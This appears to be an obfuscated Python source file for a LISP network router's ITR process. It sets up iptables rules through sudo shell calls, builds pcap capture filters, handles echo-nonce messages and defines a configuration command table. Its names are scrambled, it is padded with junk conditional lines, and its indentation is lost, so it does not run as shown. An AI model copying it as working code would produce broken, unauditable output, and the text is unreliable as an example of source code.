if 47 - 47: o0oOOo0O0Ooo
if 66 - 66: I1IiiI - IiII
if 33 - 33: I1IiiI / OoO0O00
if 12 - 12: II111iiii
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
if 92 - 92: OOooOOo + OoOoOO00 % i1IIi
if 23 - 23: I1Ii111 - OOooOOo + Ii1I - OoOoOO00 * OoOoOO00 . Oo0Ooo
if 47 - 47: oO0o % iIii1I11I1II1
if 11 - 11: I1IiiI % Ii1I - OoO0O00 - oO0o + o0oOOo0O0Ooo
if 98 - 98: iII111i + Ii1I - OoO0O00
if 79 - 79: OOooOOo / I1Ii111 . OoOoOO00 - I1ii11iIi11i
if 47 - 47: OoooooooOO % O0 * iII111i . Ii1I
if 38 - 38: O0 - IiII % I1Ii111
if 64 - 64: iIii1I11I1II1
if 15 - 15: I1ii11iIi11i + OOooOOo / I1ii11iIi11i / I1Ii111
if 31 - 31: ooOoO0o + O0 + ooOoO0o . iIii1I11I1II1 + Oo0Ooo / o0oOOo0O0Ooo
if 6 - 6: Oo0Ooo % IiII * I11i / I1IiiI + Oo0Ooo
if 39 - 39: OoOoOO00 - Oo0Ooo / iII111i * OoooooooOO
def OO0oOOoo ( sources , dyn_eids ) :
if ( os . getenv ( "LISP_NO_IPTABLES" ) != None ) :
lisp . lprint ( "User selected to suppress installing iptables rules" )
return
if 100 - 100: O0 . I11i . OoO0O00 + O0 * oO0o
if 42 - 42: oO0o % OoooooooOO + o0oOOo0O0Ooo
os . system ( "sudo iptables -t raw -N lisp" )
os . system ( "sudo iptables -t raw -A PREROUTING -j lisp" )
os . system ( "sudo ip6tables -t raw -N lisp" )
os . system ( "sudo ip6tables -t raw -A PREROUTING -j lisp" )
if 56 - 56: OoooooooOO + I1ii11iIi11i - iII111i
if 24 - 24: o0oOOo0O0Ooo + ooOoO0o + I11i - iIii1I11I1II1
if 49 - 49: I11i . ooOoO0o * OoOoOO00 % IiII . O0
if 48 - 48: O0 * Ii1I - O0 / Ii1I + OoOoOO00
if 52 - 52: OoO0O00 % Ii1I * II111iiii
if 4 - 4: I11i % O0 - OoooooooOO + ooOoO0o . oO0o % II111iiii
if 9 - 9: II111iiii * II111iiii . i11iIiiIii * iIii1I11I1II1
if 18 - 18: OoO0O00 . II111iiii % OoOoOO00 % Ii1I
oo0i1iIIi1II1iiI = "sudo ip{}tables -t raw -A lisp -j ACCEPT -d {}"
III1Ii1i1I1 = [ "127.0.0.1" , "::1" , "224.0.0.0/4 -p igmp" , "ff00::/8" ,
"fe80::/16" ]
III1Ii1i1I1 += sources + lisp . lisp_get_all_addresses ( )
for O0O00OooO in III1Ii1i1I1 :
if ( lisp . lisp_is_mac_string ( O0O00OooO ) ) : continue
I1IiI1iI11 = "" if O0O00OooO . find ( ":" ) == - 1 else "6"
os . system ( oo0i1iIIi1II1iiI . format ( I1IiI1iI11 , O0O00OooO ) )
if 2 - 2: iIii1I11I1II1
if 45 - 45: OoooooooOO / i11iIiiIii
if 10 - 10: iII111i - oO0o * iIii1I11I1II1 % iIii1I11I1II1 * IiII - I1ii11iIi11i
if 97 - 97: II111iiii % I1Ii111 + I1Ii111 - OoO0O00 / Ii1I * I1IiiI
if 17 - 17: Ii1I
if 39 - 39: ooOoO0o . II111iiii
if 45 - 45: oO0o * OoOoOO00 / iIii1I11I1II1
if 77 - 77: I1Ii111 - I11i
if ( lisp . lisp_pitr == False ) :
oo0i1iIIi1II1iiI = "sudo ip{}tables -t raw -A lisp -j ACCEPT -s {} -d {}"
iiI1iI1I = "sudo ip{}tables -t raw -C lisp -j ACCEPT -s {} -d {}"
for II11 in sources :
if ( lisp . lisp_is_mac_string ( II11 ) ) : continue
if ( II11 in dyn_eids ) : continue
I1IiI1iI11 = "" if II11 . find ( ":" ) == - 1 else "6"
for O0OOO0OOoO0O in sources :
if ( lisp . lisp_is_mac_string ( O0OOO0OOoO0O ) ) : continue
if ( O0OOO0OOoO0O in dyn_eids ) : continue
if ( O0OOO0OOoO0O . find ( "." ) != - 1 and II11 . find ( "." ) == - 1 ) : continue
if ( O0OOO0OOoO0O . find ( ":" ) != - 1 and II11 . find ( ":" ) == - 1 ) : continue
if ( commands . getoutput ( iiI1iI1I . format ( I1IiI1iI11 , II11 , O0OOO0OOoO0O ) ) == "" ) :
continue
if 27 - 27: I1ii11iIi11i * I1Ii111 - OoO0O00 + Ii1I * Ii1I
os . system ( oo0i1iIIi1II1iiI . format ( I1IiI1iI11 , II11 , O0OOO0OOoO0O ) )
if 55 - 55: ooOoO0o
if 82 - 82: I1Ii111 - OOooOOo + OoO0O00
if 64 - 64: o0oOOo0O0Ooo . O0 * Ii1I + OoooooooOO - Oo0Ooo . OoooooooOO
if 70 - 70: Oo0Ooo - oO0o . iIii1I11I1II1 % I11i / OoOoOO00 - O0
if 55 - 55: iII111i - OoO0O00
if 100 - 100: O0
if 79 - 79: iIii1I11I1II1
O00oO0o = "sudo ip{}tables -t raw -A lisp -j DROP -s {}"
for II11 in sources :
if ( lisp . lisp_is_mac_string ( II11 ) ) : continue
I1IiI1iI11 = "" if II11 . find ( ":" ) == - 1 else "6"
os . system ( O00oO0o . format ( I1IiI1iI11 , II11 ) )
if 15 - 15: I1Ii111 + I11i . OoooooooOO . i11iIiiIii
if 31 - 31: OoooooooOO + iII111i - OoOoOO00 . i1IIi % iII111i
if 43 - 43: OOooOOo * ooOoO0o / iIii1I11I1II1 - Ii1I * Ii1I
if 60 - 60: iIii1I11I1II1 . OOooOOo + I1ii11iIi11i
if 44 - 44: O0 . oO0o * i11iIiiIii % i11iIiiIii + O0 / OOooOOo
o00oOOO0Ooo = commands . getoutput ( "sudo iptables -t raw -S lisp" ) . split ( "\n" )
o00oOOO0Ooo += commands . getoutput ( "sudo ip6tables -t raw -S lisp" ) . split ( "\n" )
lisp . lprint ( "Using kernel filters: {}" . format ( o00oOOO0Ooo ) )
if 50 - 50: Ii1I - i11iIiiIii + iIii1I11I1II1 / O0 - Ii1I + o0oOOo0O0Ooo
if 22 - 22: II111iiii - Ii1I / ooOoO0o % OoooooooOO + OOooOOo
if 5 - 5: OoO0O00 / iII111i + i11iIiiIii % I11i
if 93 - 93: OoOoOO00 % iIii1I11I1II1
if 90 - 90: I1IiiI - OOooOOo / Ii1I / O0 / I11i
if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
if 93 - 93: iIii1I11I1II1 + oO0o % ooOoO0o
if 21 - 21: OOooOOo
if 6 - 6: IiII
if 46 - 46: IiII + oO0o
if 79 - 79: OoooooooOO - IiII * IiII . OoOoOO00
if ( os . getenv ( "LISP_VIRTIO_BUG" ) != None ) :
Oo00ooO0OoOo = ( "sudo iptables -A POSTROUTING -t mangle -p tcp -j " + "CHECKSUM --checksum-fill; " )
if 99 - 99: OoOoOO00
Oo00ooO0OoOo += ( "sudo iptables -A POSTROUTING -t mangle -p udp -j " + "CHECKSUM --checksum-fill; " )
if 77 - 77: o0oOOo0O0Ooo
Oo00ooO0OoOo += ( "sudo ip6tables -A POSTROUTING -t mangle -p tcp -j " + "CHECKSUM --checksum-fill; " )
if 48 - 48: OoOoOO00 % I1ii11iIi11i / I11i . iIii1I11I1II1 * II111iiii
Oo00ooO0OoOo += ( "sudo ip6tables -A POSTROUTING -t mangle -p udp -j " + "CHECKSUM --checksum-fill" )
if 65 - 65: OoOoOO00
os . system ( Oo00ooO0OoOo )
I1iI11I1III1 = lisp . bold ( "virtio" , False )
lisp . lprint ( "{} bug workaround, configure '{}'" . format ( I1iI11I1III1 , Oo00ooO0OoOo ) )
if 8 - 8: i11iIiiIii / II111iiii + o0oOOo0O0Ooo * Ii1I % IiII . I11i
return
if 6 - 6: IiII % Oo0Ooo . Oo0Ooo - I1ii11iIi11i / I11i . i1IIi
if 99 - 99: OoOoOO00 . I1Ii111
if 59 - 59: I11i / Oo0Ooo / OOooOOo / O0 / OoOoOO00 + o0oOOo0O0Ooo
if 13 - 13: o0oOOo0O0Ooo % oO0o / I1Ii111 % I1Ii111 % O0
if 90 - 90: IiII . ooOoO0o / iIii1I11I1II1
if 28 - 28: IiII + oO0o - ooOoO0o / iIii1I11I1II1 - I1IiiI
if 45 - 45: O0 / i1IIi * oO0o * OoO0O00
def o00oOo0oOoo ( sources , dyn_eids , l2_overlay , pitr ) :
if ( l2_overlay ) :
i1I11IiI1iiII = "ether[6:4] >= 0 and ether[10:2] >= 0"
lisp . lprint ( "Using pcap filter: '{}'" . format ( i1I11IiI1iiII ) )
return ( i1I11IiI1iiII )
if 35 - 35: I1ii11iIi11i / iII111i % I1IiiI + iIii1I11I1II1
if 79 - 79: OoOoOO00 / ooOoO0o
oOo00o = "(not ether proto 0x806)"
iI1iIIIi1i = " or (udp src port 4342 and ip[28] == 0x28)"
OOoooooooO = " or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"
if 4 - 4: Oo0Ooo + o0oOOo0O0Ooo
if 17 - 17: OoO0O00 * OoOoOO00
ii11i = ""
o00Oo = ""
for II11 in sources :
O000oOo = II11
if ( lisp . lisp_is_mac_string ( II11 ) ) :
O000oOo = II11 . split ( "/" ) [ 0 ]
O000oOo = O000oOo . replace ( "-" , "" )
IiiIIi1 = [ ]
for O00o00O in range ( 0 , 12 , 2 ) : IiiIIi1 . append ( O000oOo [ O00o00O : O00o00O + 2 ] )
O000oOo = "ether host " + ":" . join ( IiiIIi1 )
if 28 - 28: o0oOOo0O0Ooo
if 45 - 45: o0oOOo0O0Ooo . I1IiiI / I1Ii111 - Oo0Ooo * iIii1I11I1II1
ii11i += "{}" . format ( O000oOo )
if ( II11 not in dyn_eids ) : o00Oo += "{}" . format ( O000oOo )
if ( sources [ - 1 ] == II11 ) : break
ii11i += " or "
if ( II11 not in dyn_eids ) : o00Oo += " or "
if 86 - 86: II111iiii + ooOoO0o + IiII
if ( o00Oo [ - 4 : : ] == " or " ) : o00Oo = o00Oo [ 0 : - 4 ]
if 9 - 9: ooOoO0o + II111iiii % ooOoO0o % IiII + iIii1I11I1II1
if 59 - 59: i1IIi
if 48 - 48: O0 * Ii1I * OoO0O00 . OoO0O00 * I11i - Ii1I
if 14 - 14: I1ii11iIi11i + i11iIiiIii
if 83 - 83: I1ii11iIi11i / i11iIiiIii + II111iiii . iII111i * OOooOOo + IiII
if 42 - 42: i1IIi % II111iiii . ooOoO0o
II1II1iI = commands . getoutput ( "egrep 'lisp-nat = yes' ./lisp.config" )
II1II1iI = ( II1II1iI != "" and II1II1iI [ 0 ] == " " )
Ooo = lisp . lisp_get_loopback_address ( ) if ( II1II1iI ) else None
if 88 - 88: OoooooooOO
iIiI1I1ii1I1 = ""
O00oO = lisp . lisp_get_all_addresses ( )
for O0O00OooO in O00oO :
if ( O0O00OooO == Ooo ) : continue
iIiI1I1ii1I1 += "{}" . format ( O0O00OooO )
if ( O00oO [ - 1 ] == O0O00OooO ) : break
iIiI1I1ii1I1 += " or "
if 83 - 83: o0oOOo0O0Ooo
if 38 - 38: I1Ii111 + OoooooooOO . i1IIi
if ( ii11i != "" ) :
ii11i = " and (src net {})" . format ( ii11i )
if 19 - 19: iII111i - o0oOOo0O0Ooo - Ii1I - OoOoOO00 . iII111i . I1Ii111
if ( o00Oo != "" ) :
o00Oo = " and not (dst net {})" . format ( o00Oo )
if 48 - 48: iII111i + IiII
if ( iIiI1I1ii1I1 != "" ) :
iIiI1I1ii1I1 = " and not (dst host {})" . format ( iIiI1I1ii1I1 )
if 60 - 60: I11i + iII111i . IiII / i1IIi . iIii1I11I1II1
if 14 - 14: OOooOOo
if 79 - 79: Ii1I
if 76 - 76: iIii1I11I1II1
if 80 - 80: iIii1I11I1II1 . O0 / Ii1I % Ii1I
if 93 - 93: OoooooooOO * Oo0Ooo
if 10 - 10: I1Ii111 * OoooooooOO + I11i - I1ii11iIi11i / I1ii11iIi11i . i11iIiiIii
if ( pitr ) :
o00Oo = ""
iIiI1I1ii1I1 = iIiI1I1ii1I1 . replace ( "dst " , "" )
if 22 - 22: I1Ii111 / o0oOOo0O0Ooo
if 98 - 98: i1IIi
if 51 - 51: I1ii11iIi11i + ooOoO0o + Oo0Ooo / i1IIi + i1IIi
if 12 - 12: iIii1I11I1II1 . Ii1I . I1ii11iIi11i % I1IiiI . II111iiii . oO0o
if 32 - 32: I1ii11iIi11i + IiII / O0 / OoOoOO00 * OoooooooOO % ooOoO0o
i1I11IiI1iiII = oOo00o + ii11i + o00Oo + iIiI1I1ii1I1
i1I11IiI1iiII += iI1iIIIi1i
i1I11IiI1iiII += OOoooooooO
if 50 - 50: OoO0O00
lisp . lprint ( "Using pcap filter: '{}'" . format ( i1I11IiI1iiII ) )
return ( i1I11IiI1iiII )
if 66 - 66: iIii1I11I1II1
if 41 - 41: I1Ii111 . O0 * I1IiiI * I1ii11iIi11i
if 100 - 100: iII111i
if 73 - 73: I1ii11iIi11i % II111iiii
if 79 - 79: OoOoOO00 + OoO0O00 - II111iiii + Ii1I
if 11 - 11: oO0o + iIii1I11I1II1
if 10 - 10: O0
def Oo0000oOo ( device , pfilter , pcap_lock ) :
lisp . lisp_set_exception ( )
if 68 - 68: OOooOOo + oO0o . O0 . Ii1I % i1IIi % OOooOOo
pcap_lock . acquire ( )
i1I1iI = pcappy . open_live ( device , 9000 , 0 , 100 )
pcap_lock . release ( )
if 92 - 92: Oo0Ooo / i11iIiiIii + I1ii11iIi11i
i1I1iI . filter = pfilter
i1I1iI . loop ( - 1 , ii1iIIiii1 , device )
return
if 87 - 87: OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
if 35 - 35: IiII . O0 + Oo0Ooo + OOooOOo + i1IIi
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
if 58 - 58: OOooOOo . o0oOOo0O0Ooo + I1IiiI % Oo0Ooo - OoO0O00
if 50 - 50: iII111i % II111iiii - ooOoO0o . i1IIi + O0 % iII111i
if 10 - 10: iII111i . i1IIi + Ii1I
def oOOoOOO0oo0 ( ) :
global I11
global II1Ii1iI1i
global II1iII1i
if 87 - 87: ooOoO0o / OoOoOO00 % o0oOOo0O0Ooo * oO0o
lisp . lisp_set_exception ( )
if 77 - 77: oO0o - Oo0Ooo - iIii1I11I1II1
if 16 - 16: OoO0O00 / iII111i / i1IIi . iII111i + oO0o
if 26 - 26: iIii1I11I1II1 + i1IIi / OoOoOO00 % I1ii11iIi11i
if 44 - 44: OoooooooOO . II111iiii . OOooOOo % OoooooooOO
if 86 - 86: i11iIiiIii + O0 * IiII - OoO0O00 * OOooOOo + O0
Oo0 = [ II1Ii1iI1i , II1Ii1iI1i ,
oO0oIIII ]
lisp . lisp_build_info_requests ( Oo0 , None , lisp . LISP_CTRL_PORT )
if 94 - 94: I1Ii111 % II111iiii * i1IIi * iIii1I11I1II1
if 81 - 81: Oo0Ooo - I11i
if 24 - 24: OoooooooOO . OoO0O00 * II111iiii
if 59 - 59: I1Ii111 + OoO0O00 / OOooOOo
I11 . cancel ( )
I11 = threading . Timer ( lisp . LISP_INFO_INTERVAL ,
oOOoOOO0oo0 , [ ] )
I11 . start ( )
return
if 97 - 97: Oo0Ooo * iII111i % ooOoO0o . iII111i - I1Ii111 - OOooOOo
if 79 - 79: I1IiiI - ooOoO0o
if 37 - 37: IiII . Oo0Ooo * Oo0Ooo * II111iiii * O0
if 83 - 83: IiII / I1Ii111
if 64 - 64: OoO0O00 % IiII . I1Ii111 % OoO0O00 + I11i * IiII
if 83 - 83: o0oOOo0O0Ooo % oO0o + I11i % i11iIiiIii + O0
if 65 - 65: iIii1I11I1II1 % oO0o + O0 / OoooooooOO
def O0000oO0o00 ( kv_pair ) :
global II1iII1i
global iiI1iIiI
global I11
if 80 - 80: OoooooooOO + IiII
lispconfig . lisp_map_resolver_command ( kv_pair )
if 95 - 95: I1Ii111 / oO0o * I1Ii111 - OoooooooOO * OoooooooOO % OoO0O00
if ( lisp . lisp_test_mr_timer == None or
lisp . lisp_test_mr_timer . is_alive ( ) == False ) :
lisp . lisp_test_mr_timer = threading . Timer ( 2 , lisp . lisp_test_mr ,
[ II1iII1i , iiI1iIiI ] )
lisp . lisp_test_mr_timer . start ( )
if 43 - 43: Oo0Ooo . I1Ii111
if 12 - 12: I1Ii111 + OOooOOo + I11i . IiII / Ii1I
if 29 - 29: IiII . ooOoO0o - II111iiii
if 68 - 68: iIii1I11I1II1 + II111iiii / oO0o
if 91 - 91: OoOoOO00 % iIii1I11I1II1 . I1IiiI
I11 = threading . Timer ( 0 , oOOoOOO0oo0 , [ ] )
I11 . start ( )
return
if 70 - 70: I11i % II111iiii % O0 . i1IIi / I1Ii111
if 100 - 100: I1ii11iIi11i * i11iIiiIii % oO0o / Oo0Ooo / ooOoO0o + I1ii11iIi11i
if 59 - 59: I1Ii111 - IiII
if 14 - 14: iIii1I11I1II1 - iIii1I11I1II1
if 5 - 5: IiII
if 84 - 84: II111iiii * oO0o * II111iiii % IiII / I1IiiI
if 100 - 100: IiII . Ii1I - iIii1I11I1II1 . i11iIiiIii / II111iiii
if 71 - 71: I1Ii111 * Oo0Ooo . I11i
def i1ii1iiIi1II ( kv_pair ) :
lispconfig . lisp_database_mapping_command ( kv_pair )
return
if 98 - 98: OoO0O00 - Ii1I . IiII % i11iIiiIii
if 69 - 69: I1ii11iIi11i + iII111i * O0 . OOooOOo % OoOoOO00
if 96 - 96: ooOoO0o . ooOoO0o - I11i / I11i
if 96 - 96: i11iIiiIii / I1IiiI - O0 . ooOoO0o
if 39 - 39: ooOoO0o / O0 * IiII
if 17 - 17: Ii1I / iIii1I11I1II1 - OoO0O00 + I1IiiI % OOooOOo
if 14 - 14: o0oOOo0O0Ooo % IiII + I1ii11iIi11i + OoO0O00
if 76 - 76: OoO0O00 - i11iIiiIii + OoOoOO00 + OOooOOo / OoooooooOO
def IiI1Iii1 ( kv_pair ) :
global i111I
if 85 - 85: i11iIiiIii / i11iIiiIii . OoO0O00 . O0
if 67 - 67: II111iiii / o0oOOo0O0Ooo . OOooOOo . OoooooooOO
if 19 - 19: IiII . I1ii11iIi11i / OoOoOO00
if 68 - 68: ooOoO0o / OoooooooOO * I11i / oO0o
if 88 - 88: o0oOOo0O0Ooo
iI11 = lisp . lisp_nat_traversal
OO0O00O = lisp . lisp_rloc_probing
if 31 - 31: i11iIiiIii
if 12 - 12: ooOoO0o
if 86 - 86: oO0o - OoO0O00
if 63 - 63: I1IiiI / OoOoOO00 + OoooooooOO . I11i . ooOoO0o
lispconfig . lisp_xtr_command ( kv_pair )
if 48 - 48: i1IIi - iII111i - i11iIiiIii . I11i - iII111i * I11i
if 60 - 60: OoOoOO00 / I1ii11iIi11i + OOooOOo - iII111i
if 49 - 49: OoO0O00 - O0 / OoO0O00 * OoOoOO00 + I1Ii111
if 35 - 35: II111iiii . I1IiiI / i1IIi / I1IiiI * oO0o
Oo0O0000Oo00o = ( iI11 == False and lisp . lisp_nat_traversal and lisp . lisp_rloc_probing )
if 20 - 20: OoO0O00 . I1IiiI * i11iIiiIii / i11iIiiIii
o00 = ( OO0O00O == False and lisp . lisp_rloc_probing )
if 4 - 4: OoO0O00
ooOO = 0
if ( o00 ) : ooOO = 1
if ( Oo0O0000Oo00o ) : ooOO = 5
if 5 - 5: OoooooooOO / o0oOOo0O0Ooo % I11i % OoO0O00 * iII111i + iIii1I11I1II1
if ( ooOO != 0 ) :
I11iiI11iiI = [ i111I , i111I ]
lisp . lisp_start_rloc_probe_timer ( ooOO , I11iiI11iiI )
if 51 - 51: oO0o . iIii1I11I1II1 + OoO0O00 * Ii1I + i1IIi
if 81 - 81: O0 - Ii1I + Oo0Ooo
if 67 - 67: Ii1I
if 43 - 43: OoO0O00 % OoO0O00
if 46 - 46: Oo0Ooo % iIii1I11I1II1 . iII111i . O0 * ooOoO0o / OoooooooOO
if 7 - 7: oO0o - O0 * I11i - o0oOOo0O0Ooo - II111iiii
if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
if ( lisp . lisp_crypto_ephem_port == None and lisp . lisp_data_plane_security ) :
O00oooo00o0O = i111I . getsockname ( ) [ 1 ]
lisp . lisp_crypto_ephem_port = O00oooo00o0O
lisp . lprint ( "Use port {} for lisp-crypto packets" . format ( O00oooo00o0O ) )
i1I111Ii = { "type" : "itr-crypto-port" , "port" : O00oooo00o0O }
lisp . lisp_write_to_dp_socket ( i1I111Ii )
if 31 - 31: I1IiiI
if 73 - 73: ooOoO0o . O0 / o0oOOo0O0Ooo - OoooooooOO % i11iIiiIii
if 80 - 80: Ii1I / ooOoO0o % O0 . Oo0Ooo
if 63 - 63: OOooOOo . II111iiii . I11i
if 46 - 46: ooOoO0o % IiII - o0oOOo0O0Ooo - Oo0Ooo - Ii1I / I11i
lisp . lisp_ipc_write_xtr_parameters ( lisp . lisp_debug_logging ,
lisp . lisp_data_plane_logging )
return
if 68 - 68: i1IIi - I1ii11iIi11i / Oo0Ooo % I11i . iII111i
if 9 - 9: IiII
if 48 - 48: o0oOOo0O0Ooo + o0oOOo0O0Ooo - Oo0Ooo
if 27 - 27: OoO0O00 + OoOoOO00 * ooOoO0o
if 83 - 83: iIii1I11I1II1
if 72 - 72: I11i
if 87 - 87: i1IIi
if 48 - 48: Oo0Ooo * oO0o * iIii1I11I1II1 + i11iIiiIii - OoooooooOO
if 38 - 38: OoOoOO00 / iIii1I11I1II1 % i11iIiiIii - IiII * iII111i / OoOoOO00
def iIII11I1I1II ( ipc ) :
ii1IIiII111I , O00OoOoO , ooO0o0oo , i1I1iIi1IiI = ipc . split ( "%" )
i1I1iIi1IiI = int ( i1I1iIi1IiI , 16 )
if 79 - 79: IiII % OoO0O00
Oo0oOO = lisp . lisp_get_echo_nonce ( None , ooO0o0oo )
if ( Oo0oOO == None ) : Oo0oOO = lisp . lisp_echo_nonce ( ooO0o0oo )
if 86 - 86: iIii1I11I1II1 / O0
if 17 - 17: II111iiii
if 9 - 9: OoooooooOO + oO0o
if 33 - 33: O0
if 39 - 39: I1IiiI + Oo0Ooo
if ( O00OoOoO == "R" ) :
Oo0oOO . request_nonce_rcvd = i1I1iIi1IiI
Oo0oOO . last_request_nonce_rcvd = lisp . lisp_get_timestamp ( )
Oo0oOO . echo_nonce_sent = i1I1iIi1IiI
Oo0oOO . last_new_echo_nonce_sent = lisp . lisp_get_timestamp ( )
lisp . lprint ( "Start echo-nonce mode for {}, nonce 0x{}" . format ( lisp . red ( Oo0oOO . rloc_str , False ) , lisp . lisp_hex_string ( i1I1iIi1IiI ) ) )
if 83 - 83: i1IIi
if 76 - 76: Ii1I + iIii1I11I1II1 + OoOoOO00 . OoO0O00
if 49 - 49: IiII / ooOoO0o / OOooOOo
if ( O00OoOoO == "E" ) :
Oo0oOO . echo_nonce_rcvd = i1I1iIi1IiI
Oo0oOO . last_echo_nonce_rcvd = lisp . lisp_get_timestamp ( )
if 25 - 25: I1IiiI % O0 + i1IIi - ooOoO0o
if ( Oo0oOO . request_nonce_sent == i1I1iIi1IiI ) :
III1IiI1i1i = lisp . bold ( "echoed nonce" , False )
lisp . lprint ( "Received {} {} from {}" . format ( III1IiI1i1i ,
lisp . lisp_hex_string ( i1I1iIi1IiI ) ,
lisp . red ( Oo0oOO . rloc_str , False ) ) )
if 94 - 94: iII111i - Oo0Ooo + oO0o
Oo0oOO . request_nonce_sent = None
lisp . lprint ( "Stop request-nonce mode for {}" . format ( lisp . red ( Oo0oOO . rloc_str , False ) ) )
if 59 - 59: I11i . I1IiiI - iIii1I11I1II1 + iIii1I11I1II1
Oo0oOO . last_good_echo_nonce_rcvd = lisp . lisp_get_timestamp ( )
else :
oO0o0Oo = "none"
if ( Oo0oOO . request_nonce_sent ) :
oO0o0Oo = lisp . lisp_hex_string ( Oo0oOO . request_nonce_sent )
if 76 - 76: ooOoO0o / OoOoOO00 + I1ii11iIi11i
lisp . lprint ( ( "Received echo-nonce 0x{} from {}, but request-" + "nonce is {}" ) . format ( lisp . lisp_hex_string ( i1I1iIi1IiI ) ,
# OOooOOo
lisp . red ( Oo0oOO . rloc_str , False ) , oO0o0Oo ) )
if 65 - 65: OoOoOO00
if 91 - 91: IiII + Ii1I % Ii1I - O0 - i11iIiiIii
return
if 84 - 84: Oo0Ooo % iII111i % OoooooooOO + OOooOOo % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . Oo0Ooo * oO0o . I11i / i1IIi
if 50 - 50: I1Ii111 / i1IIi % OoooooooOO
if 83 - 83: I1ii11iIi11i * I1ii11iIi11i + OOooOOo
if 57 - 57: O0 - O0 . I1ii11iIi11i / o0oOOo0O0Ooo / Ii1I
I1IiII1I1i1I1 = {
"lisp xtr-parameters" : [ IiI1Iii1 , {
"rloc-probing" : [ True , "yes" , "no" ] ,
"nonce-echoing" : [ True , "yes" , "no" ] ,
"data-plane-security" : [ True , "yes" , "no" ] ,
"data-plane-logging" : [ True , "yes" , "no" ] ,
"frame-logging" : [ True , "yes" , "no" ] ,
"flow-logging" : [ True , "yes" , "no" ] ,
"nat-traversal" : [ True , "yes" , "no" ] ,
"checkpoint-map-cache" : [ True , "yes" , "no" ] ,
"ipc-data-plane" : [ True , "yes" , "no" ] ,
"decentralized-push-xtr" : [ True , "yes" , "no" ] ,
"decentralized-pull-xtr-modulus" : [ True , 1 , 0xff ] ,
"decentralized-pull-xtr-dns-suffix" : [ True ] ,
"register-reachable-rtrs" : [ True , "yes" , "no" ] ,
"program-hardware" : [ True , "yes" , "no" ] } ] ,
"lisp interface" : [ lispconfig . lisp_interface_command , {
"interface-name" : [ True ] ,
"device" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"dynamic-eid" : [ True ] ,
"multi-tenant-eid" : [ True ] ,
"lisp-nat" : [ True , "yes" , "no" ] ,
"dynamic-eid-device" : [ True ] ,
"dynamic-eid-timeout" : [ True , 0 , 0xff ] } ] ,
"lisp map-resolver" : [ O0000oO0o00 , {
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"dns-name" : [ True ] ,
"address" : [ True ] } ] ,
"lisp database-mapping" : [ i1ii1iiIi1II , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"secondary-instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"dynamic-eid" : [ True , "yes" , "no" ] ,
"signature-eid" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"address" : [ True ] ,
"interface" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"send-map-request" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp itr-map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp explicit-locator-path" : [ lispconfig . lisp_elp_command , {
"elp-name" : [ False ] ,
"elp-node" : [ ] ,
"address" : [ True ] ,
"probe" : [ True , "yes" , "no" ] ,
"strict" : [ True , "yes" , "no" ] ,
"eid" : [ True , "yes" , "no" ] } ] ,
"lisp replication-list-entry" : [ lispconfig . lisp_rle_command , {
"rle-name" : [ False ] ,
"rle-node" : [ ] ,
"address" : [ True ] ,
"level" : [ True , 0 , 255 ] } ] ,
"lisp geo-coordinates" : [ lispconfig . lisp_geo_command , {
"geo-name" : [ False ] ,
"geo-tag" : [ False ] } ] ,
"show itr-map-cache" : [ IIiiIiI1 , { } ] ,
"show itr-rloc-probing" : [ I1i1iii , { } ] ,
"show itr-keys" : [ oo , { } ] ,
"show itr-dynamic-eid" : [ lispconfig . lisp_show_dynamic_eid_command , { } ]
}
if 28 - 28: Oo0Ooo + IiII % II111iiii / OoO0O00 + i11iIiiIii
if 20 - 20: I1ii11iIi11i
if 3 - 3: OoO0O00 * i1IIi . I1IiiI . O0 - OoOoOO00
if 81 - 81: I1IiiI - iIii1I11I1II1 / I1IiiI / O0
if 34 - 34: Ii1I * Ii1I - I1ii11iIi11i - O0 . i11iIiiIii
if 32 - 32: iIii1I11I1II1 . OoO0O00 * oO0o / OOooOOo . II111iiii - Oo0Ooo
if ( I111I1Iiii1i ( ) == False ) :
lisp . lprint ( "lisp_itr_startup() failed" )
lisp . lisp_print_banner ( "ITR abnormal exit" )
exit ( 1 )
if 10 - 10: I1ii11iIi11i / i11iIiiIii - Ii1I + oO0o * I1IiiI
